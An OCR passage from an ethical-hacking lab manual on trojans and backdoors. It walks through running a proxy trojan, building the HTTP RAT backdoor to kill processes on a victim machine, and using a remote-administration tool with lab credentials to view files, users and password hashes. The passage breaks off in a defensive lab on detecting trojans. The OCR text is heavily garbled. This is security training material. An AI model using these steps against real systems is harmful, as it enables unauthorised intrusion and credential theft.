1 0 2 /1 7 /2 0 0 6 1 1 :4 3 AM 5 ,3 2 8 n c a f e e .e x e
1 0 9 /1 9 /2 0 1 2 0 1 : 0 7 AM <DIR> W 3bPr0xy T r 0 j 4 n C r 3 4 t 0 r <Funny Nane>
1 rFiill e <^ ss>; b5 ,3
,J 2 8 b y te s
3 D ir < s > 2 0 8 , 2 8 7 ,7 9 3 , 1 5 2 b y t e s f r e e
Z :\C E H v 8 M odule 06 T r o j a n s a n d B a c k d o o r s S T r o j a n s T y p e s \P r o x y S e r v e r T r o j a n s > —
m
FIGURE 4.3: Contents in Proxy Server folder
Type die command m cafee 8080 to mil the service 111 Windows Server
2008.
FIGURE 4.4: Starting mcafee tool on port 8080
5. The service lias started 011 port 8080.

6. Now go to Windows Server 2012 host machine and contigure the web
browser to access die Internet 011 port 8080.
7. 111 diis lab launch Clirome, and select Settings as shown 111 die
following figure.
Q 2 wwwgoogtorofv ■
m Tliis process can be

attained in any browser * C.pj
after setting die LAN lo*r ico* • O
settings for die respective
browser
Google
XjnaNCMm-
11■-‫׳‬w‫״‬n•‫ •״‬...
FIGURE 4.5: Internet option of a browser in Windows Server 2012
C E H L ab M a n u al P age 448 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

8. Click the Show advanced settings 1111k to view the Internet settings.
FIGURE 4.6: Advanced Settings of Chrome Browser
9. 111 Network Settings, click Change proxy settings.

C 0 chrcyncv/dVOflM.'Mttnpt/
I Clvotue S e ttin g s
9
4 Enitoir AutaMtc M Ml*«Dtom n *u« « c»rt. VUu)tAdofl <nflf(1
Mttmeric
Gocgit Owcfnt isw9n«y««»ccmûKrs s>S«m tc connec tc the rctMOrfc.
| OwypwstBnjt-
it (UQMthjt w«n>r 1l*nju*9«I w
Oownoads
0 01
Covmlaad kcabot: C.'lherrAi rnncti rt AT T to><i
1
U Ast »hw 10 w «Kt! lit M m dw»«10><«9
MTTPS/SM.
FIGURE 4.7: Changing proxy settings of Chrome Browser
10. 111 die Internet Properties window click LAN settings to configure
proxy settings.

Internet Properties
General [ Security ] Privacy ] Content Connections | Programs ] Advanced
To set up an Internet connection, dick Setup

Setup.
Dial-up and Virtual Private Network settings
Choose Settings if you need to configure a proxy

server for a connection.
(•) Never cfal a connection

O Dial whenever a network connection is not present
O Always dal my default connection
Current None Sgt default
Local Area Network (LAN) settings ------------------------------------------------------
LAN Settings do not apply to dial-up connections, | LAN settings \

Choose Settings above for dial-up settings.
OK ] | Cancel J ftpply
FIGURE 4.8: LAN Settings of a Chrome Browser
11. 111 die Local Area Network (LAN) Settings window, select die U se a
proxy server for your LAN option 111 the Proxy server section.
12. Enter die IP address o f Windows Server 2008, set die port number to
8080, and click OK.
F T Local Area Network (LAN) Settings
Automatic configuration
Automatic configuration may override manual settings. To ensure the
use o f manual settings, disable automatic configuration.
@ Automatically detect settings
‫ ח‬Use automatic configuration script
Address
Proxy server
Use a proxy server for your LAN (These settings will not apply to
dial-up or VPN connections).
Address: 10.0.0.13 Port: 8080 Advanced
I !Bypass proxy server for local addresses!
OK Cancel
FIGURE 4.9: Proxy settings of LAN in Chrome Browser
13. Now access any web page 111 die browser (example: www.bbc.co.uk).

FIGURE 4.10: Accessing web page using proxy server
14. The web page will open.

15. Now go back to Windows Server 2008 and check die command
prompt.
A d m in is tra to r C :\W m dow * \s y *te m 3 2 \c m d .e x e - m cafee 8080
w w w .g o o g le .c o : / c o n p l e t e / s e a r c h ? s u g e x p = c h r o m e ,n o d = 1 8 & c l i e n t = c h ro n e 8 rh l= er :1 2 0 0
. US8rq=bbc. c o - |
A c c e p ti n g New R e q u e s ts ■
w w w .g o o g le .c o :1 2 0 0 / c o n p l e te / s e a r c h ? s u g e x p = c h r o m e ,n o d = 1 8 8 t c l i e n t s‫־‬c h ro n e 8 rh l= e n
l~ U S & q = b b c .c o .u
A c c e p ti n g New R e q u e s ts !
A c c e p ti n g New R e q u e ■ * * ‫־‬ ^
/ c o n p l e te / s e a r c h ? s u g e x p = c h r o r o e ,n o d = 1 8 8 tc l i e n t = c h ro n e 8 th l= e r
l-U S & a = b b c . c o . u k
| / :b b c . c o . u k :1 3 0 1
H c c e p ti n g New K e q u e s ts ■
/ :w w w .b b c .c o .u k : 1 2 0 0
m Accessing web page A c c e p ti n g New R e q u e s ts ■
using proxy server A c c e p ti n g New R e q u e s ts !
s t a t i c . b b c i . c o . u k : / f r a n e w o r k s / b a r l e s q u e / 2 . 1 0 . 0 / d e s k t o p / 3 . 5 / s t y l e / r * a i n . c s s :2 0 0 !
s t a t i c . b b c i . c o . u k : / b b c d o t c o n / 0 . 3 . 1 3 6 / s t y l e / 3 p t _ a d s . c s s :2 0 0 !
A c c e p ti n g New R e q u e s ts ! ________________________________________________________________________
FIGURE 4.11: Background information on Proxy server
16. You can see diat we had accessed die Internet using die proxy server
Trojan.
Lab Analysis
your target’s searn tv posture and exposure dirough public and tree information.

P L E A S E TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S


Proxy Server O u tp u t: Use the proxy server Trojan to access the
T ro jan Internet
Accessed webpage: www.bbc.co.uk
Questions
1. Determine whether McAfee HTTP Proxy Server Trojan supports other
ports that are also apart from 8080.
2. Evaluate the drawbacks o f using the HTTP proxy server Trojan to access
the Internet.
In te rn e t C o n n ectio n R equired
0 Yes □ No
0 C lassroom □ !Labs

HTTP Trojan
A. Trojan is a program that contains malicious or harmful code inside apparently
harmless programming or data in such a iray that it can get control and cause

/' Valuable Hackers have a variety ot motives for installing malevolent software (malware).
information
This types o f software tends to yield instant access to the system to
S Test your continuously steal various types o f inform ation from it, for example, strategic
k n o w led g e_______ company’s designs 01‫ ־‬numbers o f credit cards. A backdoor is a program or a set
* Web exercise o f related programs that a hacker installs 011 the victim computer to allow
access to the system at a later time. A backdoor’s goal is to remove the evidence
£Q! Workbook review o f initial entry from the systems log. Hacker—dedicated websites give examples
o f many tools that serve to install backdoors, with the difference that once a
connection is established the intruder m ust log 111 by entering a predefined
password.
You are a Security Administrator o f your company, and your job responsibilities
Lab Objectives
The objective o f tins lab is to help students learn to detect Trojan and backdoor
attacks.
H Tools The objectives o f the lab include:
demonstrated in
this lab are • To run H TTP Trojan 011 Windows Server 2008
available in • Access the Windows Server 2008 machine process list using the H TTP
D:\CEH-
Proxy
Tools\CEHv8
Module 06 Trojans • Kill running processes 011 Windows Server 2008 Virtual Machine
and Backdoors
Lab Environment

‫י‬ HTTP RAT located at D:\CEH-Tools\CEHv8 Module 06 Trojans and

Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN
■ A computer nuining Window Server 2008 (host)
■ Windows 8 nuniing 111 Virtual Maclune
■ Windows Server 2008 111 Virtual Machine

■ If you decide to download the la te st version, then screenshots shown
■ You need a web browser to access Internet

■ Administrative privileges to m n tools
Lab Duration
Time: 20 Minutes

harmless programming or data 111 such a way diat it can get control and cause
damage, such as ruining die file allocation table on a hard dnve.
Note: The versions of die created client or host and appearance may differ from
Lab Tasks
HTTP RAT 1. Log 111 to Windows 8 Virtual Machine, and select die Start menu by
hovering die mouse cursor on die lower-left corner of die desktop,
u
Rtcytlt Dm
a
Mo»itla
*
firefox
Google
Chremr
W indow s 8 Release Previev.

‫ז>■׳‬8‫ח‬ Evaluation copy Build 840C
FIGURE 5.1: Windows 8 Start menu
2. Click Services ui the Start menu to launch Services.

Start
Google
Video
m m 9 Chrome
Mozilla services
.... ‫ י‬5‫י‬ Weiner

* Firefox
<3,
rm
Calendar
m B
Internet Explorer Slcfe
■
tfecttop
m aS
Uapt SfcyDrwe
>PP1:1 ■:he \\" u'.a ^

Wide Web Publisher is
mandatory as HTTP RAT FIGURE 5.2: Windows 8 Start menu Apps
runs on port 80 _ . , , _
3. Disable/Stop World Wide Web Publishing Services.
File Action View H«Jp
+ 1H1 Ei a HI 0 a l »
Services ;local)
World Wide W eb Pubfahng Service N am e Description Status Startup Type Log A

3 4 ‫־‬W indow s Firewall W indow s F 1.« Running A utom atic Loc
V/indcv/s Font Cache Service Optimizes p... Running A utom atic Loc
W indow s Im age Acquisitio... Provides im... M snu3l
W indow s Installer Adds, modi... M enusl Loc
Description: V W indow s M anagem ent Inst.. Provides a c... Running A utom atic LOC
Provides W eb c o m e c tr/rty and
•^ W in d o w s M edia Player Net... Shares Win... M anual Net
adm in s tr a to n th ro u g h th e Interret
Infcrm ation Services M anager ‫ ^־‬W in d o w s M odules Installer Enables inst... M anual
£$ V /indcw s Process Activatio... T heW indo... Running M anual
‫׳‬£ $ W indow s R em ote M anage... W indow s R... M enusl Net
W indow s Search Provides CO.- Running A utom atic (D._ Loc
W indow s Store Service (W5... Provides inf... M anual (Tng... LOC
W indow s Tim# M aintains d... M anual (T ng.. Loc
Q W indow s Update Enables t h e ... M anual (Tng... Loc
*%WinHTTP Web Proxy A uto ... WinHTTP i... Running M anual Loc
3% Wired A utoConfig T he W ire d ... M anual L0C
'•& WLAN A utoConfig The WLANS... M anual LOC
■I^WM Perform ance Adapter Provide; pe.. M anual lo c
W orkstation Cr«at«c and... Running A utom atic N tt
P I W orld W ide W eb Publnhin... Provide! W... Running M enusl u M
- WWAN A utoConfig This service .. M anual LOC v
< >
\ Mended ^Standard/
FIGURE 5.3: Administrative tools -> Services Window
4. Right-click the World Wide Web Publishing service and select

Properties to disable the service.

W orld W ide W eb Publishing Service Properties (L o ca l...
Genera1 Log On Recovery Dependencies
Service name: W3SVC
Display name: World Wide Web Publishing Service
Description: ivides Web connectivity and administration

)ugh the Internet Information Services Manager
Path to executable:
C:\Windows\system32\svchost.exe -k iissvcs
Startup type: Disabled
Helo me configure service startup options.
Service status: Stopped
Start Stop Pause Resume
You can specify the start parameters that apply when you start the service
from here
Start parameters
OK Cancel Apply
FIGURE 5.4: Disable/Stop World Wide Web publishing services
5. N ow start HTTP RAT from die location Z:\CEH-Tools\CEHv8

Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS
Trojans\HTTP RAT TROJAN.
□ HTTP RAT 0.31
r V 'k H T T P R A T
IUUI The send notification
f -W !backdoor Webserver
option can be used to send
J by zOmbie
the details to your Mail ID ?J
latest version here: [http://freenet.am/~zombie]
settings
‫ו‬
W send notification with ip address to mail
SMTP server 4 sending mail

u can specify several servers delimited with ;
smtp. mail. ru;$ome. other, smtp. server;
your email address:
|you@mail.c
I.com
close FireWalls server port: [80"
Create Exit
FIGURE 5.5: HTTP RAT main window
6. Disable die Send notification with ip address to mail option.

7. Click Create to create a httpserver.exe file.

□ HTTP RAT 0.31 E ll

/V K H T T P R A T
I !backdoor W ebserver
if■• T J h y 20mbie
v 0 .3 1
. 1
latest version here: [http://freenet.am/~zombie]
seiuriys
send notification with ip address to mail|
SMTP server 4 sending mail

u can specify several servers delimited with ;
| smtp. mail. ru;some. other, smtp. server;
your email address:

|y ou@mail.com
close FireWalls server port: 180
|i Create j| ‫־‬ Exit

_
FIGURE 5.6: Create backdoor
HTTP RAT 0.31

0 2 Tlie created
httpserver will be placed in
the tool directory /V \H T T P RAT
I -W ^backdoor Webserver
done!
la
done
send http5erver.exe 2 v ic tim
r
c
OK
|y ou@mail.com
w close FireWalls server pork:[
Create Exit
FIGURE 7.‫כ‬: Backdoor server created successfully
8. Tlie httpserver.exe tile should be created 111 die folder Z:\CEHv8

Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS
Trojans\HTTP RAT TROJAN
9. Double-click the tile to and click Run.

A pplication Tool* HTTP RAT TROJAN

M om gc
BQ New item ‫י‬ * S I O pen ‫י‬ EE s««t >11

IS □ * " Im-J Cod / path Easy access ‫י‬ 0 Edit ‫ ״ ח‬Select a one
0 »«te <harcut to * to • <t) History □ D Inrert <elert10 n
Clipboard | 01
Open File ‫ ־‬Security Warning
o® I « HTTP HTIPS Trojans >
N 3m e The publisher could n o t bp v e rifie d . A re you d ir e you w an t t o run t h k

Favorites
softw are?
■ Desktop Z itt p ia t
[g j ‫ה־‬N a m e ...TTP HTTPS T rojans\H TTP RAT TRO JA N \httpservcr.cxc
4 D ow nloads | h tlpscfvcr |
~ Publisher: U n k n o w n Publisher
*S&l R ecent places
T ype A pplication
1 . rea d m e
^ Libraries From: Z:\CEHv8 M o d u le 06 Trojans a nd B ackdoors J r o j a n s T ‫״‬
1111 D o cum ents

Music Run Cancel
B Pictures
g £ Videos
This file d o c s n o t have ‫ ג‬valid digital signature th a t verifies its

H o m e g ro u p ^3. publisher. You sh o u ld only run softw are fro m publishers y o u tr u s t
HewcanIderidewhattoftivaretomn?
T® Computer
i l . Local Oslr (C:)
4 - ‫ ׳‬CEH-Tcols (\\10.
I p Admin (admin-p
4 item s 1 item selected iO. : KB
FIGURE 5.8: Running the Backdoor
10. Go to Task Manager and check if die process is mnning.
File Options View
Processes Performance App history Startup Users Details Services
30% 52% 4% 0%
Name Status CPU Memory Disk Network
Apps (2)
> Task Manager 1.9% 6.8 MB 0 MB/s 0 Mbps
> ^ Windows Explorer 0% 25.1 MB 0.1 MB/s 0 Mbps
Background processes (9)

H Device Association Framework... 0% 3.3 MB 0 MB/s 0 Mbps
S I Httpserver (32 bit) 0% 1.2 MB 0 MB/s 0 Mbps
Microsoft Windows Search Inde... 0% 4.9 MB 0 MB/s 0 Mbps
tflf' Print driver host for applications 0% 1.0 MB 0 MB/s 0 Mbps
m Snagit (32 bit) 19.7% 22.4 MB 0.1 MB/s 0 Mbps
j[/) Snagit Editor (32 bit) 0% 19.2 MB 0 MB/s 0 Mbps
[■‫ ]־־‬Snagit RPC Helper (32 bit) 1.7% 0.9 MB 0 MB/s 0 Mbps
t> OR) Spooler SubSystem App 0% 1.5 MB 0 MB/s 0 Mbps
0 TechSmith HTML Help Helper (... 0% 0.8 MB 0 MB/s 0 Mbps
W in d o ‫־‬.*;■‫־‬. :‫ ־>־׳(־‬ff• ‫־‬, '‫־‬t‫־‬-‫־‬, ~‫ ׳‬:
( * ) Fewer details
FIGURE 5.9: Backdoor running in task manager
11. Go to Windows Server 2008 and open a web browser to access die
Windows 8 machine (here “ 10.0.0.12” is die IP address ot Windows 8
Machine).
C E H L ab M an u al P age 458 E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

*Drabe'S KTTP RAT
c | I £« ‫ ״‬iooale P] * D -
welcome 2 IITTP_RAT infected computer } : ]
.es] [brov!6«] [comouter info] [stoo httorat] [have auaaestions?] [homeoace]
w p lr n m e }:J
FIGURE 5.10: Access the backdoor in Host web browser
12. Click running processes to list the processes running on die Windows
8 machine.
Z>nbe's HTTP_RAT
1,4■ & 10.0.0. iZproc___________ C ? 1 ‫ ־‬ioojle P A E-

running processez:
[system Process]
S/stem Ikilll
srrss.exe [kill]
v*‘ninit.exe[M !]
fkilll
1
w nlogon.exe
[M !]illl
!,k
services.exe f kill]
kass.exe [ki!!]
;vchoctoxQ r < n 111
:vcho5t.exe r!<ilfl
svchostexe f kiin
dvirr.exe Ikilll
svchostexe [kill]
evehoct.axa [MID
:vchost.cxa [UdD
svchostexe [hjjj]
spoolsv.exe [kilfl
svchostexe | kill)
svchostexe [kill]
d3cHoct.ova f l-illl
MsMpCng.exeIkilll
»vc.hus»t.«x«fklin
svchostexe [killl
5vchost.exe [ kiTTj
tackho*!f.®x*» [kill]
tacU fioct.oxo[ ■ !I]
M p k x a r .t M [ M 1]
searchlndexer.exe fkilfl
Snag1t32.exe [joj]
TscHelp.exe [kill]
SnagPri./.•**[kill]
SnagitCditor.exe[I dj]
aplmjv164.exeIklll]
svchostexe fktlll
httpserver.exe (kill]
Taskmor.«»x* Ik-illl
firofoxO
.X
O [UJ
J]
FIGURE 5.11: Process list of die victim computer
13. You can kill any running processes from here.
Lab Analysis
Analyze and document the results related to die lab exercise. Give your opinion on
your target’s secuntv posture and exposure dirough public and tree mformadon.

P L E A S E TALK TO YOUR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S


Successful send httpserver.exe 011 victim machine
O u tp u t: Killed Process
System
s111ss.exe
csrss.exe
H T T P T ro jan winlogon.exe
serv 1ces.exe
lsass.exe
svchost.exe
dwm.exe
splwow64.exe
httpserver.exe
t1retov.exe
Questions
1. Determine the ports that HTTP proxy server Trojan uses to communicate.

□ Yes 0 No

Remote Access Trojans Using

Atelier Web Remote Commander
.4 Trojan is a program that contains malicious or harmful code inside apparently
harmless programming or data in such a )),ay that it can get control and cause
damage, such as ruining thefie allocation table on a hard drive.
/ Valuable A backdoor Trojan is a very dangerous infection that compromises the integrity
information
o f a computer, its data, and the personal inform ation o f the users. Remote
y 5 Test your attackers use backdoors as a means o f accessing and taking control o f a
knowledge computer that bypasses security mechanisms. Trojans and backdoors are types
TTTTT Web exercise o f bad-wares; their main purpose is to send and receive data and especially
commands through a port to another system. This port can be even a well-
m Workbook review known port such as 80 or an out o f the norm ports like 7777. Trojans are most
o f the time defaced and shown as legitimate and harmless applications to
encourage the user to execute them.
Lab Objectives
JT Tools The objective o f tins lab is to help students learn to detect Trojan and backdoor
demonstrated in attacks.
this lab are
The objectives o f tins lab include:
available in
D:\CEH- • Gain access to a remote computer
Tools\CEHv8
Module 06 Trojans • Acquire sensitive information o f the remote computer
and Backdoors
Lab Environment
To cany out tins, you need:
1. Atelier Web Rem ote Commander located at D:\CEH-Tools\CEHv8
Module 06 Trojans and Backdoors\Trojans Types\R em ote A c c e ss
Trojans (RAT)\Atelier Web Rem ote Commander


■ Windows Server 2003 running in Virtual Machine
■ If you decide to download the la te st version, then screenshots shown

■ You need a web browser to access Internet

Lab Duration
Time: 20 Minutes

damage, such as ruining the tile allocation table on a hard drive.
Note: The versions of the created client or host and appearance may dilfer from
a* TASK 1 Lab Tasks

1. Install and launch Atelier Web Rem ote Commander (AWRC) 111
Atelier Web
Remote Windows Server 2012.
Commander 2. To launch Atelier Web Rem ote Commander (AWRC), launch the
Start menu by hovering the mouse cursor on the lower-left corner o f
the desktop.
u
■ 3 W indow s Server 2012
M
VMomSw
vwXV
?DMw CMidM•
s
u.t Ev
alu
ato
rcg
pt.Eu dM0C
.rw *13PM1
FIGURE 6.1: Windows Server 2012 Start-Desktop
3. Click AW Rem ote Commander Professional 111 the Start menu apps.

Start Administrator A
CtnvUcr T
nfc
*
£
AW
Took fieoiote
Connwn..
4 &
FIGURE 6.2: Windows Server 2012 Start Menu Apps
4. The main window o f AWRC will appear as shown 111 the following
screenshot.
‫סי‬ AWRC PRO 9.3.9
File Tools Help
Desktop Syclnfo Netwarklnfo FJ# Sy*t*fn Uc*rs *nr. Grocpc Chat
‫ט‬ Tliis toll is used to

gain access to all the
information of die Remote
system
Progress Report
y , Connect Disconnect
df 0 Request ajthonrabor @ dear on iscomect

ffiytesln: C k8psln: 0 Connection Duraton
FIGURE 6.3: Atelier Web Remote Commander main window
5. Input the IP address and Usernam e I Passw ord o f the remote

computer.
6. 111 tins lab we have used Windows Server 2008 (10.0.0.13):
■ User name: Administrator
■ Password: qwerty@123
Note: The IP addresses and credentials might differ 111 your labs
7. Click Connect to access the machine remotely.

FIGURE 6.4: Providing remote computer details
Tools 8. The following screenshots show that you will be accessing the
demonstrated in Windows Server 2008 remotely.
this lab are
S 10.0.0.13 :AW RC PRO 9.3.9
available in File Tools Help
D:\CEH- Desktop Syslnfo Networidnfb Fie System Use's anc Groups Chat
Tools\CEHv8
Module 06 Trojans
and Backdoors
Internet Explo‫־‬er
windows update
j Notepad
<r ~
& Fastest *T F V *29 Monitors *
Remote Host Progress Report

| administrator #16:28:24 Initializing, please wait...
#16:28:25 Connected to 10.0.0.13
W Connect ^ Disconnect
c f □ R e q u est a jth o n ia b o r @ Clear on is c o m e c t
k5yle*I11; 201.94 k B ^ IiL 0 .8 7 Cum cLiim i D uia im i: iMinuce, 42 Seconds.
FIGURE 6.5: Remote computer Accessed
9. The Commander is connected to the Remote System. Click tlieSys

Info tab to view complete details o f the Virtual Machine.

FIGURE 6.6: Information of the remote computer

10. Select Networklnfo Path where you can view network information.
S 10.0.0.13: AWRC PRO 9.3.9
File Iools Help
Desktop Syslnfo | NetworiJnfo | Ffe System Use's anc Grocps Chat
\ Ports Safeties
\ P /T ra n sp o rt Protocols
Remark Permissions Max Uses Current Uses Path Passwoid

ADMINS Spe . Remote Admin net applica... unlimited not val■
C$ Spe .. Default share not applica.. unlimited not vali
& Tools IPCS Spe .. Remote IPC net applica unlimited not vaN
demonstrated in
this lab are
available in
D:\CEH-
Tools\CEHv8
Module 06 Trojans
and Backdoors
Remote Host Progress Report
#16.28.24 Initializing, please wait
#16:28:25 Connected to 10 0.0.13
^ Connect A / Disconnect
eP D Request ajthonrabor @ dear on iscomect

Ifiy te s ln : 250.93 kSps In: 0.00 Connection Duraton: 5 Minutes, 32 Seconds.
11. Select the File System tab. Select c:\ from the drop-down list and
click Get.
12. Tins tab lists the complete files ol the C :\ drive o f Windows Server
2008.

10.0.0 .1 3 : AW R C PRO 9.3.9
file Iools Help
Desktop Syslnfo NetworicJnfb I Fie System I Use's and Groups Chat
co n te n ts o f 'c:'_______
CIJ SRecycle Bin
Cl Boot
C3 Documents and Settings
C□ PerfLogs
D Program Files (x86)
□ Program Files
Cl ProgramData
D System Volume Inform...
□ Users
□ Windows
File System: NTFS Type Fixed Capacity: 17,177,767.936 bytes
Serial Number: 6C27-CD39 Labei: Free space: 6.505.771.008 bytes
Progress Report
| administrator #16.28.24 Initializing, please wait...
Password #16:28:25 Connected to 10.0.0.13
^ Connect Disconnect
cf ] Request ajthoriratxx‫־‬ @ Oear on is c o m e c t
kBytesIn: 251.64 ConnectonCXjraton: 6 Minutes, 18 Seconds.
13. Select U sers and Groups, which will display the complete user
details.
10.0.0.13 :A W R C PRO 9.3.9 '‫ ־‬: ‫" ם‬
File Jools Help
Desktop Syslnfo NetworkJnfo Ffe System Use's anc Groups I Chat
j Users ^ Groups \ Password H aîes
User Information for Administrator

User Account. Administrator
Password Age 7 days 21 hours 21 minutes 33 seconds
Privilege Level: Administrator
Comment Built-in account for administering the computer/domain
Flags: Logon script executed. Normal Account.
Full Name:
Workstations can log from: no restrictions
Last Logon: 9/20/2012 3:58:24 AM
Last Logoff: Unknown
Account expires Never expires
User ID (RID) 500
Pnmary Global Group (RID): 513
SID S 1 5 21 1858180243 3007315151 1600596200 500
Domain WIN-EGBHISG14L0
No SubAuthorties 5
Remote Host User Name Progress Report

1 0.0.0.13 [ administrator #16:28:24 Initializing, please wait...
W Connect ^ Disconnect
nf D Request ajthon:at>or @ Oear on is c o m e c t
kByle* 111: 256.00 C um euiim i3u1atu< 1: e Minutes, 2 6 Seconds.

rs 10.0.0.13: AWRC PRO9.3.9

file Iools Help
Desktop Syslnfo NetwortJnfo We System Use's and Groups Chat
\ | Groups ~ | y Passwoid Ha«hes
Names SID Comment

Groups: Administrators S-1-5-32-544 (Typo Alias/Do Administrators have complete and unrestricted
Backup Operator S-1-5-32-551 (Type Alias/Do Backup Operators can override security restrict
Certificate Service DC S-1-6-32-674 (Type Alias/Do . Members of this group are allowed to connect t«
Cryptographic Oserat S-1-5-32-569 (Type Alias/Do Members are authorized to perform cryptograph
Distributed COM Use‫־׳‬s S-1-5-32-562 (Type Alias/Do . Members are allowed to launch. actKate and us
Event Log Readers 5-1-5-32-573 (Type Alias/Do... Members of this group can read event logs from
Guests S-1-5-32-546 (Type Alias/Do Guests have the same access as members oft
III
<1 _____I
Global
G ro u p s : S -1-5-21-1858180243-3007315... Ordinary users
Progress Report
| administrator #16.28.24 Initializing, please wait...
^ Connect Disconnect
c f ] Request a jth on rab or @ d e a r on is c o m e c t
kBytesIn: 257.54 Connection Ouraton: ?Minutes, 34Seconds.
14. Tins tool will display all the details o f the remote system.
15. Analyze the results o f the remote computer.
Lab Analysis
Analyze and document tlie results related to die lab exercise. Give your opinion on
your target’s security posture and exposure dirough public and tree information.



Remotely accessing Windows Server 2008
R esult: System inform ation o f remote Windows

Server 2008
Network Information Path remote Windows Server
Atelier Web
2008
Remote
Commander viewing complete tiles of c:\ o f remote Windows
Server 2008
User and Groups details o f remote Windows Server
2008
Password hashes
Questions
1. Evaluate die ports that A\\”RC uses to perform operations.
2. Determine whether it is possible to launch AWRC from the command line

and make a connection. If ves, dien illustrate how it can be done.

□ Yes 0 No
0 C lassroom

Detecting Trojans
A Trojan is aprogram that contains malicious or harmful code inside apparently
harmlessprogramming or data in such a >raj that canget control and cause damage,
such as mining thefile allocation table on a hard drive.

f~'/ Valuable Most individuals are confused about the possible ways to remove a Trojan virus
information
from a specific system. One m ust realize that the World Wide W eb is one o f
.‫ *'■׳י‬Test your the tools that transmits information as well as malicious and harmful viruses. A
____ knowledge______ backdoor Trojan can be extremely harmful if not dealt with appropriately. The
Web exercise ^ main function o f tins type o f virus is to create a backdoor 111 order to access a
specific system. With a backdoor Trojan attack, a concerned user is unaware
m Workbook review about the possible effects until sensitive and im portant information is found
missing from a system. With a backdoor Trojan attack, a hacker can also
perform other types ot malicious attacks as well. The other name for backdoor
Trojans is remote access Trojans. The main reason that backdoor Trojans are
so dangerous is that they hold the ability to access a particular machine remotely
(source: http://w w w .com bofix.org).
Lab Objectives
attacks.
The objectives o f the lab mclude:
& Tools • Analyze using Port Monitor

demonstrated in
• Analyze using Process M onitor
this lab are
available in • Analyze using Registry Monitor
D:\CEH-
Tools\CEHv8 • Analyze using Startup Program Monitor
Module 06 Trojans
• Create MD5 hash tiles for Windows directory files
and Backdoors

Lab Environment
To carry out this, you need:
■ Tcpview, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and
Backdoors\Port Monitoring Tools\TCPView
■ Autoruns, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and
B ackdoors\Process Monitoring Tools\Autoruns
■ PrcView, located at C:\CEH-Tools\CEHv7 Module 06 Trojans and
B ackdoors\Process Monitor Tool\Prc View
■ Jv16 power tool, located at D:\CEH-Tools\CEHv8 Module 06 Trojans
and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012
‫י‬ FsumFrontEnd. located at D:\CEH-Tools\CEHv8 Module 06 Trojans
and Backdoors\Files and Folder Integrity Checker\Fsum Frontend
& Disabling and Deleting
■ Windows Server 2003 running 111 Yutual Machine
Entries
If you don't want an entry to ■ If you decide to download the la te st version, then screenshots shown
active die nest time you
boot or login you can either
disable or delete it. To
disable an entry uncheck it. ■ You need a web browser to access Internet
Autoruns will store die
startup information in a ■ Administrative privileges to run tools
backup location so diat it
can reactivate die entry
when you recheck it. For Lab Duration
items stored in startup
folders Autoruns creates a Tune: 20 Minutes
subfolder named Aiitoruns
disabled. Check a disabled
item to re-enable it Overview of Trojans and Backdoors
A Trojan is a program diat contains m alicious or harmful code inside apparently
damage, such as ruining die lile allocation table on a hard drive.
Note: The versions of the created client or host and appearance may differ from
what it is 111 the lab, but the actual process of connecting to the server and accessing
the processes is same as shown 111 tins lab.
m. TASK 1 Lab Tasks

1. Go to Windows Server 2012 Virtual Machine.
Tcpview
2. Install Tcpview from the location D:\CEH-Tools\CEHv8 Module 06 Trojans
and Backdoors\Port Monitoring Tools\TCPView.
3. The TCPYiew main window appears, with details such as Process, Process
ID, Protocol, Local address. Local Port, Remote Address, and Remote Port.

TCPView - Sysinternals: www.sysinternals.com

File Options Process View Help
H a h |
|| Process > PID Protocol Local Address Local Pott
C l dns.exe 1572 TCP win-2n9stosgien domain w fl
T7 dns.exe 1572 TCP WIN-2N9ST0SGL domain V‫׳‬/l
T7 dns.exe 1572 TCP WIN-2N9ST0SGL 49157 Wl
T 7 dns.exe 1572 UDP win-2n9stosgien domain
i - dns.exe 1572 UDP WIN-2N9ST0SGL domain
03 Should delete items that I"7 dns.exe 1572 UDP WIN-2N9ST0SGL 49152
you do not wish to ever i 7‫ ־‬dns.exe 1572 UDP WIN-2N9STOSGL 49153
execute. Do so by choosing i" 7 dns.exe 1572 UDP WIN-2N9ST0SGL 49154
Delete in the Entry menu. IF dns.exe 1572 UDP WIN-2N9STOSGL 49155
Only die currendy selected » dns.exe 1572 UDP WIN-2N9STOSGL 49156
1‫ י‬dns.exe 1572 UDP WIN-2N9ST0SGI.. 49157
item will be deleted. » 1 dns.exe 1572 UDP WIN-2N9STOSGL 49158
T7 dns.exe 1572 UDP WIN-2N9ST0SGL 49159
r dns.exe 1572 UDP WIN-2N9STOSGI.. 49160
» dns.exe 1572 UDP WIN-2N9STOSGL 49161
T dns.exe 1572 UDP WIN-2N9STOSGL 49162
‫ י‬dns.exe 1572 UDP WIN-2N9ST0SGI.. 49163
r dns.exe 1572 UDP WIN-2N9ST0SGI.. 49164
‫ י‬dns.exe 1572 UDP WIN-2N9ST0SGI.. 49165
‫ ׳ י‬dns.exe 1572 UDP WIN-2N9ST0SGI.. 49166
1‫ ־‬dns.exe 1572 UDP WIN-2N9ST0SGI.. 49167
1 dns.exe 1572 UDP WIN-2N9ST0SGL 49168
T dns.exe 1572 UDP WIN-2N9STOSGL 49169
• ‫ ו‬dns.exe 1572 UDP WIN-2N9STOSGI.. 49170
• dns.exe 1572 UDP WIN-2N9STOSGL 49171 V 1
< r III >
_____________ ______________ ______________ ______________ _________________ U

FIGURE 8.1: Tcpview Main window
tool perform port monitoring.

TCPView - Sysinternals: www.sysinternals.com I ~ I □ f X
-
1 File Options Process View Help
y a ‫@ !־‬
Process ' PID Protocol Local Address |Local Port 1R ^
E l svchostexe 385G TCP WIN-2N9ST0SGI.. 5504 Wl
(O svchostexe 892 TCP WIN-2N9STOSGI.. 49153 Wl
E l svchost.exe 960 TCP WIN-2N9STOSGL 49154 Wl
E l svchost.exe 1552 TCP WIN-2N9STOSGL 49159 Wl
E l svchost.exe 2184 TCP WIN-2N9ST0SGL 49161 Wl
E svchost.exe 3440 TCP WIN-2N9STOSGI.. 49163 Wl
E svchost.exe 4312 TCP WIN-2N9ST0SGI.. 49168 Wl
